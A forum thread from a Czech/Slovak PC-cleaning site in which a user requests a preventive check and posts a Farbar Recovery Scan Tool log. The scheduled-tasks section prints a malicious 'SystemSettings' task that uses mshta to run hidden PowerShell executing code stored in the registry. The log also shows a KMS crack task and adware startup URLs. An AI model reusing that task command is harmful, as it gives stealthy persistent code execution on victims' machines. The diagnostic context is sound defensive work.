Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

Prosim o preventivnu kontrolu

Nemáte v tuto chvíli žádný problém s pc a chcete se jen ujistit, že je vše v pořádku?
Vložte log z FRST nebo RSIT.

Moderátor: Moderátoři

Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Zamčeno
Zpráva
Autor
imicro
Návštěvník
Návštěvník
Příspěvky: 83
Registrován: 08 led 2008 16:28

Prosim o preventivnu kontrolu

#1 Příspěvek od imicro »

Dobry den, prosim o preventivku. PC slape v poriadku, ale nastal cas (ako u zubara).

FRST
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-10-2020
Ran by Tomika (administrator) on TOM (Gigabyte Technology Co., Ltd. Z87-HD3) (23-10-2020 10:44:48)
Running from C:\Users\Tomika\Desktop
Loaded Profiles: Tomika
Platform: Windows 8.1 Pro (Update) (X64) Language: English (United Kingdom)
Default browser: Chrome
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(A FOUR TECH CO., LTD. -> ) C:\Program Files (x86)\Bloody7\Bloody7\Bloody7.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated -> Adobe Systems Inc.) D:\Programy\Adobe\Acrobat\Acrobat\acrotray.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Autodesk, Inc -> Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(Cole Williams Software Limited -> ) C:\Windows\SysWOW64\Codecs\TrayMenu.exe
(CrypKey (Canada) Ltd.) [File not signed] C:\Windows\System32\Crypserv.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Programy\Epic Games\Launcher\Engine\Binaries\Win64\UnrealCEFSubProcess.exe
(Epic Games Inc. -> Epic Games, Inc.) D:\Programy\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe
(Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <50>
(Intel(R) pGFX -> ) C:\Windows\System32\igfxTray.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe
(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Driver Booster\7.2.0\Pub\PreCare.exe
(Manhattan Engineering Incorporated -> Kite) C:\Program Files\Kite\kited.exe
(Manhattan Engineering Incorporated -> Kite) C:\Program Files\Kite\KiteService.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Oxygen Cloud Inc. -> ) C:\Users\Tomika\.odrive\bin\6729\odriveapp.exe
(Oxygen Cloud Inc. -> odrive) C:\Users\Tomika\.odrive\bin\6729\odrive.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.) C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe
(Stichting Blender Foundation -> Blender Foundation) C:\Program Files\Blender Foundation\Blender 2.90\blender.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) D:\Programy\TeamViewer\TeamViewer_Service.exe
(Wacom Technology Corp. -> Wacom Technology) C:\Program Files\Tablet\Wacom\WacomHost.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TabletUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(Wacom Technology Corporation -> Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(Wondershare software CO., LIMITED -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppService.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1893496 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18391120 2019-03-31] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [File not signed]
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [711616 2016-04-19] (Autodesk, Inc -> Autodesk, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => D:\Programy\Adobe\Acrobat\Acrobat\Acrotray.exe [3499896 2014-05-08] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-10-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [Codec Settings UAC Manager] => C:\Windows\SysWOW64\Codecs\CodecUACManager.exe [66192 2018-03-20] (Cole Williams Software Limited -> )
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [GalaxyClient] => [X]
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [EpicGamesLauncher] => D:\Programy\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [32546704 2020-10-23] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [91701608 2020-07-30] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Bloody2] => C:\Program Files (x86)\Bloody7\Bloody7\Bloody7.exe [19841264 2020-02-13] (A FOUR TECH CO., LTD. -> )
HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Run: [Kite] => C:\Program Files\Kite\kited.exe [625822184 2020-10-14] (Manhattan Engineering Incorporated -> Kite)
HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\Windows\system32\AdobePDF.dll [55432 2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe [2020-10-21] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2018-06-11]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\Codecs\TrayMenu.exe (Cole Williams Software Limited -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\odrive.lnk [2017-07-27]
ShortcutTarget: odrive.lnk -> C:\Program Files\odrive\odrive.exe (Oxygen Cloud, Inc -> ) [File not signed]
GroupPolicy: Restriction - Chrome <==== ATTENTION
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0291BC3E-5758-4AE0-B583-887997C4F7E5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {08667DDA-529A-4AE5-B93A-F3FB2AFB6863} - System32\Tasks\npcapwatchdog => C:\Program Files\Npcap\CheckStatus.bat [862 2019-04-30] () [File not signed]
Task: {14E9279D-E202-421D-9345-9FF6FF65892A} - System32\Tasks\AutoKMS => D:\Programy\MS Office\KMS_tooltip_crack\AutoKMS.exe
Task: {19B48E07-EF07-43C1-89F3-DC0C7BE14F95} - System32\Tasks\CCleanerSkipUAC => D:\Programy\CCleaner\CCleaner.exe [26588344 2020-09-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {240525CC-07E9-4C0E-BF92-7FD8CBC01AAC} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\Scheduler.exe [149776 2019-11-14] (IObit Information Technology -> IObit)
Task: {2AE7DBC0-9D7B-4633-9F38-EA13D59FFC97} - \Movie\Movie task -> No File <==== ATTENTION
Task: {2C5BAA6C-22CE-4023-8CD3-920F648F948D} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [436856 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {3B6DA161-FF75-4709-9698-E8B4D4E29F7A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {521E2DEE-AF47-458B-BE39-05E41D7000C3} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe [1112576 2017-05-19] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co. Ltd.)
Task: {56E7C739-D87C-4968-A298-0FA8DD870A67} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {57E8FD86-D77A-4957-AF8A-185FF714EF38} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [495224 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {5DFEF0DB-1EC0-4858-9DE9-295F0928B552} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {5FBDD006-E7EF-4EB4-B15F-E75C13219037} - System32\Tasks\SystemSettings => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\WOW6432Node\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close)
Task: {67CAE894-9940-43DF-A154-A01C69C48B7F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-05-02] (Google Inc -> Google Inc.)
Task: {69904E5D-AA09-4F07-8269-73B550B28214} - System32\Tasks\JavaUpdateSched => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [653728 2018-03-26] (Oracle America, Inc. -> Oracle Corporation)
Task: {7354C34F-FF87-4E86-89AB-F2B6844E5835} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [1693816 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8116AA3D-F35E-4EE1-A65F-61E452CB28B9} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_445_pepper.exe [1497656 2020-10-13] (Adobe Inc. -> Adobe)
Task: {8623AE83-BCCD-4DB0-BE84-45A87C9A0D5E} - System32\Tasks\CCleaner Update => D:\Programy\CCleaner\CCUpdate.exe [686384 2020-09-08] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {AF11B0C8-2370-4BF1-A148-2AC2A2B5F4A3} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [649336 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B669C2DF-0043-43E2-BD6E-2B93975B0C19} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {BBB840E0-DF47-4533-842A-614A9FB55DB2} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {C5600166-0D00-436C-9597-BB2E48267804} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
Task: {D9E3F3C1-96EA-408C-93C5-EAB8CC220326} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [728184 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E3339F51-E6A0-4320-BFB4-20947A367484} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-2643689781-145595849-2857803826-1001 => C:\Users\Tomika\AppData\Local\MEGAsync\MEGAupdater.exe [615160 2019-04-14] (Mega Limited -> Mega Limited)
Task: {E43C15E6-6414-4ACA-846C-D124676E2AD8} - System32\Tasks\Driver Booster SkipUAC (Tomika) => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\DriverBooster.exe [7749904 2019-12-19] (IObit Information Technology -> IObit)
Task: {E83C055E-EA00-442C-83F5-A1DF6B84C917} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\7.2.0\AutoUpdate.exe [2361104 2019-12-18] (IObit Information Technology -> IObit)
Task: {EDF106E5-69AB-49FB-9A36-0AF6F148BFCB} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [728184 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FA8EF300-7063-437D-9ECE-A3820122D686} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [649336 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FB2E7073-3061-4C88-848B-30215EF82E06} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [946296 2017-05-03] (NVIDIA Corporation -> NVIDIA Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.81.1 213.46.172.38 213.46.172.39
Tcpip\..\Interfaces\{1F7EB040-CEB2-48F8-A98A-A024DE0DE62A}: [DhcpNameServer] 192.168.81.1 213.46.172.38 213.46.172.39

Edge:
======
Edge Profile: C:\Users\Tomika\AppData\Local\Microsoft\Edge\User Data\Default [2020-07-01]

FireFox:
========
FF DefaultProfile: 006jgses.default
FF ProfilePath: C:\Users\Tomika\AppData\Roaming\Mozilla\Firefox\Profiles\006jgses.default [2020-10-21]
FF Session Restore: Mozilla\Firefox\Profiles\006jgses.default -> is enabled.
FF Extension: (AdBlocker Ultimate) - C:\Users\Tomika\AppData\Roaming\Mozilla\Firefox\Profiles\006jgses.default\Extensions\adblockultimate@adblockultimate.net.xpi [2020-10-20]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCFirefoxExtn [2017-01-04] [Legacy] [not signed]
FF Plugin: @java.com/DTPlugin,version=13.0.1.0 -> C:\Program Files\Java\jre-10.0.1\bin\dtplugin\npDeployJava1.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=13.0.1.0 -> C:\Program Files\Java\jre-10.0.1\bin\plugin2\npjp2.dll [2018-05-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-12] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-02-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @wolfram.com/Mathematica -> C:\Program Files (x86)\Common Files\Wolfram Research\Browser\11.0.1.5597552\npmathplugin.dll [2016-09-21] (Wolfram Research, Inc. -> Wolfram Research, Inc.)
FF Plugin-x32: Adobe Acrobat -> D:\Programy\Adobe\Acrobat\Acrobat\Air\nppdf32.dll [2014-08-05] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-12] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [No File]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default [2020-10-23]
CHR Notifications: Default -> hxxps://calendar.google.com; hxxps://web.skype.com; hxxps://www.messenger.com
CHR HomePage: Default -> hxxp://www.seznam.cz/?clid=13415
CHR StartupUrls: Default -> "hxxp://feed.helperbar.com/?p=mKO_AwFzXIpYRa0T-NJ1bNV5iGB7j76kR7EOZGkeQkbUBtqSnxy0q4qOqRPdLMQ5814Ip_0Bcs96ceKxOJ3yAx3ac2A20wh1BTmHSKoac3d5DU0PKrFavIAzFxl1cPGixbg440pQsLkCnd8sKH-Ln2Ju87vPmwn5rVbntl2zC3PO29IJVaQ5afAlJNtFeJI,","hxxp://www.google.com/","hxxp://d2ucfwpxlh3zh3 ... mode=loadm"
CHR NewTab: Default -> Active:"chrome-extension://jpfpebmajhhopeonhlcgidhclcccjcik/newtab.html"
CHR Session Restore: Default -> is enabled.
CHR Extension: (Flash Video Downloader) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\aiimdkdngfcipjohbjenkahhlhccpdbc [2020-10-09]
CHR Extension: (ColorZilla) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhlhnicpbhignbdhedgjhgdocnmhomnp [2019-04-02]
CHR Extension: (Mendeley Web Importer) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\dagcmkpagjlhakfdhnbomgmjdpkdklff [2020-10-09]
CHR Extension: (Adobe Acrobat) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-09-16]
CHR Extension: (Video Downloader professional) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\elicpjhcidhpjomhibiffojpinpmmpil [2020-07-26]
CHR Extension: (News Feed Eradicator for Facebook) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjcldmjmjhkklehbacihaiopjklihlgg [2020-10-21]
CHR Extension: (Vysor) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gidgenkbbabolejbgbpnhbimgjbffefm [2020-09-04]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2020-10-16]
CHR Extension: (Google Kalendář) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmbgaklkmjakoegficnlkhebmhkjfich [2020-06-11]
CHR Extension: (Toby for Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hddnkoipeenegfoeaoibdmnaalmgkpip [2020-10-15]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2020-10-23]
CHR Extension: (Google Keep – poznámky a seznamy) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2020-10-23]
CHR Extension: (Obvibase: an online database editor) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\hoddinokjifhganfcgkjmkkngljebjdj [2020-09-02]
CHR Extension: (WhatFont) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\jabopobgcpjmedljpbcaablpmlmfcogm [2019-04-02]
CHR Extension: (Speed Dial 2 New tab) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2020-04-16]
CHR Extension: (Auto Replay for YouTube™) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanbnempkjnhadplbfgdaagijdbdbjeb [2019-11-25]
CHR Extension: (Grammarly for Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2020-10-21]
CHR Extension: (Any.do Extension) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdadialhpiikehpdeejjeiikopddkjem [2019-04-02]
CHR Extension: (Zoom for Google Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\lajondecmobodlejlcjllhojikagldgd [2020-08-14]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2020-10-12]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-03]
CHR Extension: (Any.do) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\ocgddccilgpeepgglnlpchkpgamkgmld [2019-04-02]
CHR Extension: (Chrome Media Router) - C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-10-08]
CHR Profile: C:\Users\Tomika\AppData\Local\Google\Chrome\User Data\System Profile [2019-06-09]
CHR HKU\S-1-5-21-2643689781-145595849-2857803826-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - D:\Programy\Adobe\Acrobat\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2014-05-08]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdAppMgrSvc; C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe [1262096 2016-04-19] (Autodesk, Inc -> Autodesk Inc.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [83984 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
S3 AdobeFlashPlayerUpdateSvc; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-10-13] (Adobe Inc. -> Adobe)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
